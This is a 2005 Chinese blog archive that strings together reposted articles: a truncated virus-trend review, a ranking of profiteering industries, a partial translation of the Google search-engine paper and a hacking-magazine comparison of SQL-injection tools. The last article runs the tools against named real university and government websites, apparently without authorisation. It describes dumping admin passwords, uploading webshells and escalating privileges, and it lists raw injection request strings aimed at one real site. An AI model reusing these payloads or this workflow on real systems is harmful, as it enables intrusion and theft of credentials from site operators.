漏洞仍然是蠕虫病毒的最常规手段,从今年来看,出现了最新的漏洞利用攻击方式。分别是“狙击波”(Worm.Zotob)利用的“MS05-039 即插即用服务漏洞”,以及年底才出现的利用“MS05-051 分布式事务处理协调器服务漏洞”的“大师”(Worm.Dasher)。随着漏洞攻击代码在网上的详细公布,造成的后果便是迅速被多种病毒利用,作为传播的手段。
网站的漏洞——脚本病毒,木马、黑客的帮凶
脚本病毒已经不再作为攻击系统的主要方式,而转而成为了各种木马、黑客的辅助工具。2005年脚本病毒出现了一个非常重要的现象,这便是互联网本身的安全问题,本年度大量网站被黑,政府网站、娱乐网站、个人主页等等无一例外,被注入的大都是JS.Twgirl等一类的脚本病毒,当用户访问此类网站时就会激活JS.Twgirl,从而下载木马、黑客等恶意代码,遭受各种病毒侵袭以及安全威胁。
邮件蠕虫——寻找更新的传播方式
传统的邮件蠕虫随着网络生活的丰富,也出现新的传播方式,以今年最臭名昭著的“恶鹰”病毒来说,病毒将用户邮件地址收集到服务器,当出现新变种时会对这些邮件地址发送病毒邮件,使用户只要收到过“恶鹰”的某一个变种就会继续收到以后的变种。
驱动技术——病毒新趋势
病毒驱动技术的使用,是病毒技术的提高,也成为了病毒发展的一个全新的趋势。特别是对病毒自身的保护上做足了功夫。病毒通过驱动技术实现了隐藏进程、隐藏文件、隐藏注册表加载项,在正常系统中完全看不到病毒的综迹,给查杀病毒带来了巨大的困难。
根据对本年病毒的总结,金山反病毒监测中心预测在未来的2006年里:
以利益驱动的病毒(木马、黑客)会成为主流,这一类的病毒数量和病毒感染量将会占到80%以上,为此将出现更多的网游、网银盗号木马、病毒。
即时通讯平台继续成为病毒传播的温床,可能再添新的欺骗手段,这将与网络钓鱼同步进行。每年都有新装机、新系统,用户都有可能忘记修补旧的系统漏洞和新系统漏洞的出现,因此系统漏洞
分类 : 网络日志 | 发表时间 30-12-2005
我们身处于被各种暴利行业盘剥的过程之中,放眼望去,从汽油到学费,从就医到殡葬,无不如此……
市场经济的一般规律是一个行业不可能长期获取暴利,然而正处于转型期的中国由于垄断和市场秩序混乱,行业暴利问题仍很突出。我们根据相关部门的统计数据以及相关读者调查推出《法制早报》2005年十大暴利行业排行榜,希望能引起全社会对行业暴利问题的关注和思考。我们对暴利行业的盘点,更是在期盼着中国经济的改革能够顺利走过“十一五”这个关键阶段,希望中国的社会经济发展能有更加有序公平的市场环境。
《法制早报》2005年中国十大暴利排行榜核心特点:
□国际炒作与国内政策双重因素使得能源行业急剧蹿升榜首,呈现结构性暴利特点
□家电、汽车、日用消费品等行业全面退出暴利排行榜
□房地产行业暴利依旧,但离榜首已渐行渐远
□网络游戏和美容整形为代表的新兴服务业由于监管失位,首次进入排行榜前列
盘点2005十大暴利行业
□专题策划:毛剑平 焦红艳 □采 访:实习记者 周斌 周密 张俐
谁之暴利?如何暴利?
能源:暴利榜榜首事出有因
关键词:煤老板、油荒、官煤勾结
北京的王先生现在开车养成了一个新习惯,远远地见到红灯亮了,就挂在空档上滑行。以前他并不是这样,这样做完全是因为空档可以省油。一路飙升的油价,不得不让他算计着降低加油的频率。
大凡和能源沾边的2005年都与暴利或者涨价有关。油涨价、煤涨价,还有每年都上演的大面积“电荒”,以致于北京的居民用电也从0.44元涨到了0.48元。
大小煤矿的矿难,我们几乎隔一段日子就能听见。官煤勾结屡禁不止的背后是暴利支撑。
今年的各种富豪排行榜又一股新势力,是来自唐山或者山西的这种能源产区的煤矿老板。尽管有各种消息称明年我国的电力有供大于求的趋势,但是这丝毫不能影响我们把能源排在暴利排行榜第一位的决心。
不管能源行业是不是有一天能够淡出暴利时代,单就2005年一年来说,是绝对的一路看涨。
药品与医疗:改革何时成功?
关键词:500万医药费、医疗改革铁败、号贩子
2003年底,在一次制药行业研讨会上,国家发改委一位司长应邀出席。当这位司长站在演讲台上问大家:“你们想听真话吗?”获得预料之中的答案之后,司长要求所有在场记者关掉采访机。在接下来的半个小时内,大家能听到的都是诉苦和抱怨,是各个部门之间的矛盾和不协调。奇怪的是,这次会议之后,没有一个记者报道这件事情。而没有报道的原因很简单,大家都觉得信心尽失,缺乏希望。一年后,在官方宣布医疗改革失败之时,人们已经显得波澜不惊。
根据药品零售价格与生产成本之比,众多药品的零售价在生产成本的3倍以上,将药品列入暴利行业,似乎一点也不冤。药品价格高,对于医药企业而言是虚的,大部分的差价没有归入生产企业利润账户。据有关人员调查,药品从出厂到最终到消费者手里,企业目前大概只有15%的利润,剩下的是在流通领域,其中大多利润落到医院里。这种现象,称之为药价虚高。药价虚高到什么程度?我们看看“平价药”的销售情况就知道了。合肥的百姓缘大药房,药品平均降价45%,药店仍然有利可图。
事情往往就是这样,正当的利益得不到保障时,利益就会以迂回的方式潜伏前进,其数额甚至要比正当方式获得的更大。当几年前各地政府下定决心放弃对大部分、缩小对小部分医院的财政支持的时候,所谓的“暴利”就已经在行业内名正言顺、理直气壮了。
中小学教育:不道德的高利润率
关键词:择校费、义务教育全免费
近日,发生在湖南桂阳县六中的克扣学生伙食费事件再次把人们的目光聚焦到教育产业上来。在3年半的时间内,克扣学生伙食费近百万元。其中大部分伙食费被学校挪用或私分,而学生基本每餐都只能就着水煮豆渣皮下饭,每天3餐达不到3元钱的标准。 (据《中国青年报》12月7日报道)
据一些教育专家保守测算,10年的教育乱收费从中小学生的口袋里搜走了2000多亿元。
中小学教育的暴利是我们最不愿看到的。中小学教育本应属于公益事业。在我国,学校是财政全额拨款的事业单位。既然是公益性机构,就不应以赢利为目的。然而,中小学教育不仅赢利,而且还成为暴利行业。有人认为,教育成了暴利行业是国耻。关于这个行业的暴利,来自于乱收费。就本质而言,教育乱收费说到底就是“利用公共权力牟取私利”。
北京可能是择校最严重的地区。据说正常的择校收费标准是3万元,而不少一类校的择校费严重超标,达到四五万元,有的甚至高达六七万元。北京地区共有中学791所,其中有择校生的有200多所,大约占三分之一。综合计算一下,全市中学择校生的年收入在10亿元以上,这还只是一个比较保守的估计。经过初步统计,北京市中学收入过千万的至少在20家以上,而且这些收入可以视为纯利润。在另一个大城市上海,政府明文规定,寄宿制高级中学、市重点高中的择校费(一次性)最高分别为4万元和3万元。至于这些费用的使用情况,在北京,高中的择校费不上缴,初中的择校费通常自留70%至75%,剩余的25%至30%由教育局统一调剂给师资力量较为薄弱的三类校,以提高三类校的师资力量和教学水平。
在中国,孩子的钱总是那么好赚。孩子的教育成了很多家庭最大的一项消费支出。除了中小学教育,甚至幼儿园的利润也是畸高的。有家长抱怨,中小学生比大学生还要费钱。我们希望,在中国,孩子们都能最多的享受到国家的教育,更希望能少花点钱,或者花的钱,都能用在提高孩子的受教育程度上。
殡葬:利润无从计算
关键词:明码标价
据调查,很多殡葬服务和殡葬用品经营者不明码标价,漫天要价现象普遍。济南泺河小区一家殡葬用品商店的李先生说:“现在殡葬用品都是这个价,大家要得都高,我也就不可能低价出售,况且很多人还认为越贵对死者就越尊重,便宜了人家还不愿意买呢!”
这是个大家都忌讳提起的行业。可是每个人总难免要有和他们打交道的时候。关于这个行业最大的新闻就是在历年的暴利行业排行榜上,它都非常靠前。
为什么有这么大的利润空间呢。中国人是尊崇孝道的国家。亲人去世,在最后的送别过程中,很多人愿意风风光光的把亲人送走。这助长了这个行业漫天要价的习惯。
一个成本只有几十元的骨灰盒,可以卖到三四千元甚至更多。一个亲人去世,往往要花掉几万元。一般情况下,殡葬行业一般的利润都能够保证在300%左右,甚至可以达到1000%甚至2000%。
教材出版:请给一个选择课本的机会
关键词:教材、新华书店
今年7月份,新华社发表的文章《大批官员“落马”背后 出版发行“水
”有多深》,抛出了出版发行产业里的腐败链。
高生荣,山西临县新华书店原经理,贪污公款700多万元,被吕梁市中级法院一审判处死刑,缓期二年执行;侯福康,曾任贵州省新华书店教材、教辅发行中心主任,贵州省新闻出版局机关服务中心原副主任,贪污受贿470余万元,2004年底,贵阳市中级人民法院以受贿、贪污罪判处侯福康无期徒刑;刘彻,曾任湖南省新华书店财务部经理兼审计科科长,贪污千万元炒股,几乎血本无归,造成直接经济损失1174万元,2004年初,刘彻被判处死刑。如此多的官员接二连三东窗事发,可见新华书店这样的发行单位已经不可避免地成为了腐败的重灾区,这与长期以来教材的垄断发行,拥有暴利的折扣回扣有着密不可分的关系。
教材出版业的利润丰厚主要与我国一直实行的高度行政垄断教材出版发行体制有关——教育行政部门垄断编审,教育出版社垄断出版,新华书店垄断发行。中国教育网总经理,中国教育家协会常务理事马占锋先生认为,我国中小学教材出版发行始终按照出版管理部门指定出版社出版、新华书店总发行这种垄断运营机制,教材行业基本上属于垄断行业。虽然我国2002年就开始推行中小学教材发行改革,引入竞争机制,不单纯的依靠新华书店,但新华书店的垄断态势在短期内仍难打破。教材发行几年来一直是各级新华书店的“利润奶牛”。据专家分析,目前,多数省份新华书店70%以上的利润依靠教材发行,在很多基层新华书店,这一比例甚至高达90%以上。根据国家新闻出版总署的统计数据:全国共出版图书170962种,总印数68.7亿册,定价总金额535.12亿元,而中小学课本有8260种,总印数33.124亿册,总定价金额为154.988亿元。中小学教材品种仅占图书总品种的4.8%,但总印数和总定价却分别占48%和29%。
高速公路:交通厅长纷纷落马背后
关键词:毕玉玺、交通厅
交通行业的暴利从一个典型案例和一个奇特现象可以清晰地反映出来。今年3月16日,北京市原交通局副局长毕玉玺因受贿和私分国有资产被判处死缓。他成为中国自1997年以来“落马”的第17位交通厅局长。这串长长的厅长名单也成为国际著名反腐组织“透明国际”刚刚公布的《2005年度全球腐败报告》中国部分的首选案例。
“道路通车,厅长落马”的现象已经成为中国反腐败领域的一大特点,甚至出现了河南省三任交通厅长前“腐”后继的罕见现象。交通系统缘何成为“腐败重灾区”,究其原因,恐怕包括高速公路在内的交通行业存在的暴利难辞其咎。
另据中央电视台报道,江苏某高速公路的一个普通收费员的月薪就超过8000元,有的甚至超过1万,可见此行业的暴利已经上升到什么程度。而且,高速公路公司拥有巨大的现金流,以福建高速为例,其每股经营性现金流量高达0.68元,其现金流之高在国内没有任何行业能与之媲美。因此,高速公路行业被形象地比喻为一台高速运转的印钞机。
高速公路行业的暴利性导致了高速公路行业的商业化,高速公路的商业化也相辅相成的继续促进了其利润的增长。以北京首都机场高速公路为例,2005年上半年首都机场高速的车流量增加了10.68%,营业额增长了9.7%。这一数据可以看出,我们的高速公路的车流量依然呈迅速增长的趋势,高速公路的暴利性也将继续进一步保持。
医生自曝医疗黑幕 极品黄金首发
有线电视:最不思进取的行业
关键司:涨价
“这么多的家庭,这么多的电视,却都在为一家公司交钱。”一位长期关注有线电视发展的专家如是说。收视费调价以后,北京一个城市将为“歌华有线”每年带来1.4亿元的新增收益。关于这个行业,可以用一句话概括:都是垄断惹的祸。偌大一个北京,有一千多万人口,竟只有一家有线电视网运行商,它可以称得上是垄断企业中的垄断企业。
尽管有线电视的收视费在不断上涨,但有线电视的服务质量却没有随着“水涨船高”。有分析称:“独享有线电视运营权垄断经营的中国有线电视,是中国最不思进取的行业,除了一波又一波的提高电视收费,好像就没有别的办法增加自己的收益。在国外,发达国家早已看到了有线电视网惊人的资源潜力,有线电视网不仅可以用来收看有线电视,还能用来上网和打电话,完全可以三网合一,不仅能大大地减少资源的浪费,还能大大地减少用户的开支。”其实这也难怪,一个完全没有竞争压力却又能坐收暴利的行业哪里还有什么动力去进取!
房地产:房子已成为一种期货
关键词:期货、垄断
当今的房地产,其实早就和购房者的需求没有什么直接的关系了,而房子对于开发商来讲,也早就不属于经济意义的商品范畴。房地产市场,类似期货市场。
国家统计局统计显示,今年1至8月,全国商品住宅平均销售价格为2996元/平方米,与去年每平方米2525元的价格相比,上涨18.7%。房地产开发也保持较快增长速度。1月~8月,全国房地产开发投资8900多亿元,同比增长超过20%。
老百姓的住房梦依然是望梅止渴。为什么把房价降下来这么难?站在房改新政对立面的如果仅仅是房地产商,那么,推行房改新政这件事便太简单太容易了。问题是房地产商的身边还站着银行和主管该行业的政府部门(不仅是地方政府的行业主管部门),这是一支非常强大的集团军。于是,谁胜谁负便难说了。
中国房地产企业数量极多,虽无垄断之名,但已有垄断之实。原因是,无论开发商有多少,但在购房者面前都表现出极其统一的行为,仿佛是同一家公司:价格是一涨都涨,这个楼盘涨了那个楼盘涨,这个城市涨了,那个城市跟着涨,房价由此不断攀升。房地产的涨价行为,似乎有个虚拟的总公司在发提价通知一样。
有学者分析,房地产商在短期内成为富豪,不是凭正常的市场竞争,也不是凭他们个人的市场能力与市场智慧,而是利用政府权力对城市弱势群体及农民土地资源的掠夺。我以为,这道出了房地产商暴富的本质:打着市场的旗号,卖着市场的价格,却享受着计划的优惠。
网络游戏:免费了 但还是暴利
关键词:陈天桥、网吧
11月28日,“热血传奇,永久免费”八个血红大字跳入玩家“轩辕剑客”的眼帘,但他并没有为此感受到丝毫的兴奋。“今非昔比,与我每月对‘传奇’投入上千元相比,免去一个月点卡费35元实在是算不了什么!”
《热血传奇》运行三年,把盛大老总陈天桥推向了胡润版的《中国百富榜》首位;《魔兽世界》现身短短几个月,便使九城公司扭亏为盈。据中国互联网络信息中心(CNNIC)称,到2005年4月底我国上网用户已经突破1亿,网民数仅次于美国居世界第二位。而其中网络游戏玩家已接近2000万,如此庞大的一个数字,正是网络游戏盈利最坚实的基础。也正因为如此,靠网络游戏赚得盆满钵溢之后,盛大为了回笼“人气”,不惜以《传奇》的“免费”作代价。
业内人士称,网络游戏产业的毛利率高达50%以上
分类 : 技术文摘 | 发表时间 30-12-2005
信息来源:baggio785的专栏
原文地址:http://www-db.stanford.edu/~backrub/google.html
这篇文章中,我们介绍了google,它是一个大型的搜索引擎(of a large-scale search engine)的原型,搜索引擎在超文本中应用广泛。Google的设计能够高效地抓网页并建立索引,它的查询结果比其它现有系统都高明。这个原型的全文和超连接的数据库至少包含24’000’000个网页。我们可以从http://google.stanford.edu/ 下载。
设计搜索引擎是一项富有挑战性的工作。搜索引擎为上亿个网页建立索引,其中包含大量迥然不同的词汇。而且每天要回答成千上万个查询。在网络中,尽管大型搜索引擎非常重要,但是学术界却很少研究它。此外由于技术的快速发展和网页的大量增加,现在建立一个搜索引擎和三年前完全不同。
本文详细介绍了我们的大型搜索引擎,据我们所知,在公开发表的论文中,这是第一篇描述地如此详细。除了把传统数据搜索技术应用到如此大量级网页中所遇到的问题,还有许多新的技术挑战,包括应用超文本中的附加信息改进搜索结果。
本文将解决这个问题,描述如何运用超文本中的附加信息,建立一个大型实用系统。任何人都可以在网上随意发布信息,如何有效地处理这些无组织的超文本集合,也是本文要关注的问题。
关键词 World Wide Web,搜索引擎,信息检索,PageRank, Google
1 绪论
Web给信息检索带来了新的挑战。Web上的信息量快速增长,同时不断有毫无经验的新用户来体验Web这门艺术。人们喜欢用超级链接来网上冲浪,通常都以象Yahoo这样重要的网页或搜索引擎开始。大家认为List(目录)有效地包含了大家感兴趣的主题,但是它具有主观性,建立和维护的代价高,升级慢,不能包括所有深奥的主题。基于关键词的自动搜索引擎通常返回太多的低质量的匹配。使问题更遭的是,一些广告为了赢得人们的关注想方设法误导自动搜索引擎。我们建立了一个大型搜索引擎解决了现有系统中的很多问题。应用超文本结构,大大提高了查询质量。我们的系统命名为google,取名自googol的通俗拼法,即10的100次方,这和我们的目标建立一个大型搜索引擎不谋而合。
1.1网络搜索引擎—升级换代(scaling up):
1994-2000 搜索引擎技术不得不快速升级(scale dramatically)跟上成倍增长的web数量。
1994年,第一个Web搜索引擎,World Wide Web Worm(WWWW)可以检索到110,000个网页和Web的文件。
到1994年11月,顶级的搜索引擎声称可以检索到2‘000’000(WebCrawler)至100‘000’000个网络文件(来自 Search Engine Watch)。
可以预见到2000年,可检索到的网页将超过1‘000’000‘000。同时,搜索引擎的访问量也会以惊人的速度增长。
在1997年的三四月份,World Wide Web Worm 平均每天收到1500个查询。
在1997年11月,Altavista 声称它每天要处理大约20’000’000个查询。随着网络用户的增长.
到2000年,自动搜索引擎每天将处理上亿个查询。我们系统的设计目标要解决许多问题,包括质量和可升级性,引入升级搜索引擎技术(scaling search engine technology),把它升级到如此大量的数据上。
1.2 Google:
跟上Web的步伐(Scaling with the Web)建立一个能够和当今web规模相适应的搜索引擎会面临许多挑战。抓网页技术必须足够快,才能跟上网页变化的速度(keep them up to date)。存储索引和文档的空间必须足够大。索引系统必须能够有效地处理上千亿的数据。处理查询必须快,达到每秒能处理成百上千个查询(hundreds to thousands per second.)。随着Web的不断增长,这些任务变得越来越艰巨。然而硬件的执行效率和成本也在快速增长,可以部分抵消这些困难。还有几个值得注意的因素,如磁盘的寻道时间(disk seek time),操作系统的效率(operating system robustness)。在设计Google的过程中,我们既考虑了Web的增长速度,又考虑了技术的更新。Google的设计能够很好的升级处理海量数据集。它能够有效地利用存储空间来存储索引。优化的数据结构能够快速有效地存取(参考4.2节)。进一步,我们希望,相对于所抓取的文本文件和HTML网页的数量而言,存储和建立索引的代价尽可能的小(参考附录B)。对于象Google这样的集中式系统,采取这些措施得到了令人满意的系统可升级性(scaling properties)。
1. 3设计目标
1.3.1提高搜索质量我们的主要目标是提高Web搜索引擎的质量。
1994年,有人认为建立全搜索索引(a complete search index)可以使查找任何数据都变得容易。根据Best of the Web 1994 — Navigators ,“最好的导航服务可以使在Web上搜索任何信息都很容易(当时所有的数据都可以被登录)”。然而1997年的Web就迥然不同。近来搜索引擎的用户已经证实索引的完整性不是评价搜索质量的唯一标准。用户感兴趣的搜索结果往往湮没在“垃圾结果Junk result”中。实际上,到1997年11月为止,四大商业搜索引擎中只有一个能够找到它自己(搜索自己名字时返回的前十个结果中有它自己)。导致这一问题的主要原因是文档的索引数目增加了好几个数量级,但是用户能够看的文档数却没有增加。用户仍然只希望看前面几十个搜索结果。因此,当集合增大时,我们就需要工具使结果精确(在返回的前几十个结果中,有关文档的数量)。由于是从成千上万个有点相关的文档中选出几十个,实际上,相关的概念就是指最好的文档。高精确非常重要,甚至以响应(系统能够返回的有关文档的总数)为代价。令人高兴的是利用超文本链接提供的信息有助于改进搜索和其它应用 。尤其是链接结构和链接文本,为相关性的判断和高质量的过滤提供了大量的信息。Google既利用了链接结构又用到了anchor文本(见2.1和2.2节)。
1.3.2搜索引擎的学术研究随着时间的流逝,除了发展迅速,Web越来越商业化。
1993年,只有1.5%的Web服务是来自.com域名。到1997年,超过了60%。同时,搜索引擎从学术领域走进商业。到现在大多数搜索引擎被公司所有,很少技公开术细节。这就导致搜索引擎技术很大程度上仍然是暗箱操作,并倾向做广告(见附录A)。Google的主要目标是推动学术领域在此方面的发展,和对它的了解。另一个设计目标是给大家一个实用的系统。应用对我们来说非常重要,因为现代网络系统中存在大量的有用数据(us because we think some of the most interesting research will involve leveraging the vast amount of usage data that is available from modern web systems)。例如,每天有几千万个研究。然而,得到这些数据却非常困难,主要因为它们没有商业价值。我们最后的设计目标是建立一个体系结构能够支持新的关于海量Web数据的研究。为了支持新研究,Google以压缩的形式保存了实际所抓到的文档。设计google的目标之一就是要建立一个环境使其他研究者能够很快进入这个领域,处理海量Web数据,得到满意的结果,而通过其它方法却很难得到结果。系统在短时间内被建立起来,已经有几篇论文用到了Google建的数据库,更多的在起步中。我们的另一个目标是建立一个宇宙空间实验室似的环境,在这里研究者甚至学生都可以对我们的海量Web数据设计或做一些实验。
2. 系统特点
Google搜索引擎有两个
分类 : 技术文摘 | 发表时间 19-12-2005
前言
随着ASP的日趋成熟,各种检测工具也逐渐流行了起来。如今,几乎每一个学习黑客的网迷手里都有一款或几款得心应手的注入工具。但我通过QQ群了解到,有相当一大部分人认为这些工具的注入手法是相同或相近的。其实这种说法只说对了一部分,在提交“and 1=1”、“and 1=2”进行漏洞判断时,这些软件所使用的方式的确是一样的,但接下来在猜解表名、猜解列名、猜解记录上,各软件所用的方式方法却不尽相同。
为了使菜鸟们能够更清楚的了解各软件的注入强点和注入弱点,以便物尽其用。本人特摘取啊D、NBSI、HDSI、WED、冰舞、CSC和Domain七种网络上常见的注入工具进行逐一分析,并列出部分注入语句以便读者更好的进行对比和学习,并附带了解一下作者的思路。
希望读者在看过此文后能对各注入软件有一个系统的了解,也希望编程人员能编出更好的注入软件来。
测试
本次测试是从网上随机选出的一些站点,分别用七种工具进行注入并统计结果。原准备要检测100个网站的,可是在检测到第四个网址时就发现了差距,因此也就没有检测太多的必要了。在此检测的七个站点仍是从这100个网址中随机挑选的,根据统计学的概率和正向分布原理,本测验也是有说服力的。
在Google中利用关键词查询:“大学 asp?id=43”,取得如下URL:
http://www.daofeng.net/articledisp.asp?ID=43
http://english.sdut.edu.cn/show_news2.asp?id=43
http://yzg.stu.edu.cn/tzgz/list.asp?id=43
http://www.merica.com.tw/win-asp/maintain/ShowSchool.asp?id=43
在Google中利用关键词查询:“下载 asp?id=43”,取得如下URL:
http://www.xinw.cn/show.asp?id=43
在Google中利用关键词查询:“新闻 asp?id=43”,取得如下URL:http://www.ectcom.com/ebusiness/Read.asp?ID=43
在Google中利用关键词查询:“政府 asp?id=43”,取得如下URL:
http://www.netdtzgl.gov.cn/rules/viewrules.asp?id=43
数据代表:
检测不出漏洞 n
猜解表名 a+数目,*无法猜解,+不准确,/无用数据
猜解列名 b+数目,*无法猜解,+不准确,/无用数据
猜解记录 c+数目,*无法猜解,+不准确,/无用数据
检测结果:
NBSI HDSI 啊D Domain 冰舞 CSC WED 数据库
1 a3b4c1 a4b4c2 *** a1++ a1+* *** *** sql,错误关
2 n n a2b3c1 a2b3c1 n /** /** acc
3 a2b3c1 a2++ a2b3c1 a2b3c1 *** a1b1c1 a1b2c1 acc
4 a2b3c2 a2b3c2 a2b3* a2b3* n a1** a1// acc
5 a1b3c2 a1b2/ a1b3* a1b3* a1b2* a1** a1b1/ acc
6 a2b3c5 a2b3c6 a3b3c5 a1** *** a1** a1b1/ acc
7 全部 全部 *** *** *** *** a1b2* sql,错误开
速度 B A A A A A A
综合认定 A B A B D C B
现在,哪一款工具性能更优越,你该很清楚了吧?下面我们就来具体分析一下每一个软件。
测试与评比
1.啊D
啊D是一款很不错的绿色软件,体积还不到300kb,对于我们在网吧奋战的一族来说真是够体贴了!利用啊D可以得到大部分有注入漏洞的管理员用户名和密码,速度也相当快,结果也很准确。当软件运行一次后,直接修改注入地址就可以进行下一次注入,这是WED,CSC,NBSI,Domain所不能的。功能也比较简单,就是暴密码,找后台,然后通过后台上传WebShell,再进一步提权。但啊D也有很多不足之处:
1)对某些明明有漏洞的站点检测不出,提示无漏洞,此时也只能改用其它软件了,我个人经验认为此时用NBSI比较好,如果连NBSI都检测不出的话,就只能放弃这个注入点了。
2)对MSSQL数据库错误提示开启时依旧采用了字典穷举的方式,而没有像其它软件采取暴字段的方式,因此速度会很慢而且支持也不是很好,这时要是遇见“***_admin”这类字典里没有表名就有些力不从心了。只会出现几个默认的表。
3)偶尔在穷举密码时会出现“检测长度已超过50……”这样的错误。
实际上并没有,如果换成WED或NBSI的话便可以轻易拿到密码。一般时如果啊D在通用的表下注入成功,那么WED也可以,不过啊D是GUI界面的,一切可控而且由于它提交的是Ascii代码,因此可以暴出中文密码来,这是只通过数字+字母+符号穷举的WEB所不能的。
4)还有一个不足之处就是当我们已经暴到想要的表(如admin),想要进一步暴列,或是暴了列想进一步暴密码时,会发现上一进程并没有停止,我们也没有任何方式让它停下。这些已经不需要的进程很影响破解的速度,使我们无法体验它飞快的感觉。
2。NBSI
NBSI是款老牌注入工具,似乎我们不应该再挑挑拣拣了。它在对MSSQL数据库的注入上已经趋近完美,但我最近却也发现了一个NBSI不能注入,啊D,WEB等也无能为力,但HDSI却可以注入的网址。它在un.org的新闻页面上,有兴趣的朋友可以去看看。
NBSI的其它功能也不错,譬如站点列表功能,虽然我只成功用过一次,但正是那次使我拿下了那个站点。还有命令行工具、后台猜解,提起它们的原因是当我们转向这些页面时,填入的网址并没有跟着跳转,这是个很令人头疼的问题,相信也是很多人弃NBSI去用其它工具的原因。
另外NBSI有时会出现“int13变量错误”或“页面转向,是否重试”的提示。
当后者出现时还可以直接按确定不管它,但若是前者,只能乖乖把程序重启一遍了。另外暴不出数据也是个难题,如图4所示。
而且NBSI的体积也太大了些,差不多要和啊D、CSC、WED、HDSI、Domain加起来一样大了,在网吧没有2分钟是绝对下不下来的!
3.HDSI
HDSI功能要比NBSI多得多,即使在注入方面也毫不逊色,这一点我们在上面的测试中就可以看出了,而且它的速度是很快的,几乎是NBSI的一倍。除此之外它在注入消息的细节的显示上也比NBSI更丰富。
因此也有人宣称它可以取代NBSI,但真是如此么?
发现了什么吗?列有一个为“name”,列有两个为“id”、“pass”,其实图8只是对同一网址再次检测的结果。如果用NBSI的话,则三个列名均能显示出来。而“name”与“pass”不能同时暴出,这样的数据对我们又有什么用呢?我相信这不是一个偶然。通过此图和上面的测试列表,我想告诉大家的一个事实是:所暴数据的多少不仅仅是字典的问题,这也是我为什么把所暴数据的个数也列出来的原因。
但正如我说的,工具性能有长有短。虽然HDSI除了速度外并不比其它工具更出色,但那个联合国的新闻页不是也只有它才能暴出么?同一个工具在不同的站点的表现是不同的,不同的工具在同一站点的表现也是不同的!这跟我们看人一样。
4。WED
对小榕的这个工具真没有什么好说的,又快又小,建议人手一个。虽然要在CMD下运行,但在浩做成了GUI页面的启动后,便显得更加完美了。只是在复制密码时不是很方便,若是32位的……另外WED并不支持对中文密码的猜解,这点在程序运行时就看得到,它穷举的并不是Ascii代码。
WED的一个小小的
BUG是在有时破解结束时,显示的并不是完整的密码,而是形如a*min这种情况,这时把数据先记下来,然后重新注入一次。一般会得到正确的密码或形如adm*n等,而此时你根据记录的a*min就应该推测出密码为admin。
WES没有HDSI和NBSI那么多功能,只能得到管理员用户和密码,但你对于这个全自动注入、体积超小、速度极快的工具又有什么奢求呢?
5.冰舞
不知道为什么,当我第一次操作这款工具注入时就感觉很累。输入了网址后首先不管三七二十一就要你输入关键词。这意味着我们要打开两个窗口分别在网址结尾加上“and 1=1”和“and 1=2”,然后耐心地等待页面显示出来,再一点一点地比较,然后在“and 1=1”页面复制“and 1=2”页面没有的字符,在切换窗口粘贴……我想现在读者也该累了,呵呵。而你会得到多少有用信息呢?看看上面的测试表吧!而且它的错误也是我第一次见到。
输入一个有注入漏洞的网址和关键词进行检测,提示不存在漏洞,我们再一次点击检测按钮,却又提示存在漏洞。在第四次点击时,跳出图中窗口,点击确定后程序自动关闭……
对于喜欢用冰舞的黑友们,我只能送一句话给你们:“其实世界可以变得更美好……”。
6.CSC
这个工具的功能与WED、WIS一样,暴密码找后台。我没有找到这个工具的什么优点,它有的别的软件都有,而别的软件有的它却没有。有时有的网站明明有漏洞它却检测不出。而且由于是挂着字典破解,速度也不快,注入一次,就要把那个设置页面统统重设一遍,即使你仅仅想找后台。
我用WED跟它做过比较,它不仅速度没有WED快,对有些页面检测不出,有时甚至暴不出密码来……唯一值得说的是它应该是国内公布出来的免费的第一款脚本注入检测工具,臭要饭的当初写的时候很早,那时候脚本注入都停留在手工上面,也算是小小的里程碑了。
7.Domain
在这里抓个图给大家看,至于评点,呵呵……它和啊D很像,你们看我对啊D的评点吧!另外通过那张测试表,你们也应该能对比出点什么。
总结
其实注入也是门学问,即使我们用工具也会长不少见识。
看出什么了么?对了!它的name字段并不是有用的数据,有用的数据在应该为表示序列的uid中。这次检测WED和CSC就是因为暴的是name字段,所以最终以失败而告终。而用啊D等工具的朋友是不是也会在没有去暴uid时面对那奇怪的name而发楞呢?是啊!人的思想是奇妙的,希望读者能从本文中读到文章中没有的东西,呵呵。
最后把NBSI和HDSI对于确定服务器信息的几行重要的提交代码在这里公布一下,希望软件编程人员能从中总结点什么:
HDSI
/rules/viewrules.asp?id=43;create%20table%20t_jiaozhu(jiaozhu%20varchar(200))
/rules/viewrules.asp?id=43%20and(char(94)%2Bdb_name()%2Bchar(94))>0
/rules/viewrules.asp?id=43;declare%20@a%20int–
/rules/viewrules.asp?id=43%20And%20Cast(IS_SRVROLEMEMBER(‘sysadmin’)%20as%20varchar(1))=1
/rules/viewrules.asp?id=43%20And%20char(94)%2Buser%2Bchar(94)=0
/rules/viewrules.asp?id=43%20And%20char(94)%2Bdb_name()%2Bchar(94)=0
NBSI
/rules/viewrules.asp?id=43
/rules/viewrules.asp?id=43%20and%20user%2Bchar(124)=0
/rules/viewrules.asp?id=43;declare%20@a%20int–
/rules/viewrules.asp?id=43%20and%20(Select%20count(1)%20from%20[sysobjects])>=0
/rules/viewrules.asp?id=43%20And%20user%2Bchar(124)=0
/rules/viewrules.asp?id=43%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1
/rules/viewrules.asp?id=43%20And%20Cast(IS_MEMBER(0x640062005F006F0077006E0065007200)%20as%20varchar(1))%2Bchar(124)=1
/rules/viewrules.asp?id=43%20And%20db_name()%2Bchar(124)=0
好了,文章写完了,希望能为广大新手朋友带来一些帮助.
作者: 梦之光芒(Monyer)
来 源: 《黑客防线》
